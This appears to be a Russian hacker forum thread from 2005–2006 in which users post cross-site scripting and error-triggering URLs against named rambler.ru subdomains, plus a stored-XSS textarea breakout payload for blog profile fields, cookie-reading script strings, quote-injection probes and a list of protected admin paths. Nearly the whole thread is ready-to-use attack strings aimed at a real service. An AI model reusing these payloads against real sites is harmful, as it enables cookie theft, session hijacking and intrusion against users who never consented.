Уязвимости: rambler.ru

Winux · 05.11.2005

XSS язвочка в rambler.ru

Буду краток: вот суть баги:

Код:

http://rambler.ru/click?_URL=[XSS]

Нашел ее drmist. Почитать о ней можно в его статье: Бажный header() под микроскопом.
[mod][Ŧ1LAN:] Объединил 3 темы. Просьба все баги на рамблере постить только в эту тему.[/mod]

Winux · 16.11.2005

XSS уязвимости на Rambler

Наконец то рамблер стали ковырять. Обнаружено ряд багов в этом движке.

Примеры:

Код:

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?
ftype=5&form=%3Cscript%3Ealert(/XSS/)%3C/script%3E&site=
ftp.elektra.ru&dir=%3Cscript%3Ealert(/XSS/)%3C/script%3E

http://finance.rambler.ru/db/chain.html?type=fix&chain_id=
!RUBFIX=%3Cscript%3Ealert(/XSS/)%3C/script%3E&show_ind_lst=
rustypes&show_ind_lst=curs

http://finance.rambler.ru/db/chain.html?show_ind_lst=
fortypes&type=forex&chain_id=!FX=%3Cscript%3Ealert(/XSS/)%3C/script%3E

http://pokupki.rambler.ru/?action=goods&dir=&no_img=&dl=
&s=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&minp=
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&maxp=
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&x=60&y=14&cat=80%2F36%2F3%2F0

http://smi.rambler.ru/main.cgi?action=
%3Cscript%3Ealert('XSS')%3C/script%3E&name=sources/index.html

http://www.rambler.ru/db/sport/news.html?d=
%3Cscript%3Ealert('XSS')%3C/script%3E

Баги ессно не оч опасные но всеже баги...

[.iNcluDe] · 17.11.2005

Источник и другие мелкие баги на http://antisec.2x4.ru/advisories/rambler.txt

D1m0n · 30.11.2005

Интересное... http://info.rambler.ru/server-status
http://info.rambler.ru/db/auth/ed/section_...e=1&wow=1&n=201
http://info.rambler.ru/db/auth/ed/save.html
http://info.rambler.ru/db/auth/ed/edit.htm...tml%3Fitypes%3D
http://info.rambler.ru/db/auth/ed/save.html
http://info.rambler.ru/db/missing.shtml
http://info.rambler.ru/db/auth/ed/section_...e=1&wow=1&n=201
и тд...
Правда все они запаролены =((

nmb795 · 24.02.2006

Бала найдена пассивная XSS уязвимость в модуле http://vision.rambler.ru/srch/. В этом модуле не фильтруется переменная word. Например:

Код:

http://vision.rambler.ru/srch/?sort=0&set=vision&words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

Добавлено в [time]1140797224[/time]
Активная XSS уязвимость существует в модуле http://planeta.rambler.ru/action/blog/profile.html где не фильтруются переменные epigraph и blog_name
Например:

Код:

</textarea><script>alert(document.cookie);</script>

Источник: http://ivdb.org

iNcluDe · 06.03.2006

Решил потратить немного времени на поиск багов на rambler.ru, результат не заставил себя ждать

[XSS]

http://olymp2006.rambler.ru/shedule.html?d...

%3C/script%3E

http://olymp2006.rambler.ru/winners.html?d.../)%3C/script%3E

http://www.rambler.ru/db/sport/news.html?d...

%3C/script%3E

http://adstat.rambler.ru/wrds/?date=0601&w...

%3C/script%3E

[Ошибки]

http://nakarte.rambler.ru/samara/?query=4%27&x=15&y=4'

http://topshop.rambler.ru/click.html?id=4'

zeromag · 06.03.2006

последний линк хороший

Уязвимости: rambler.ru

Winux

Старожил форума

Winux

Старожил форума

[.iNcluDe]

CD-диск

D1m0n

floppy-диск

nmb795

CD-диск

iNcluDe

floppy-диск

zeromag

(L2) cache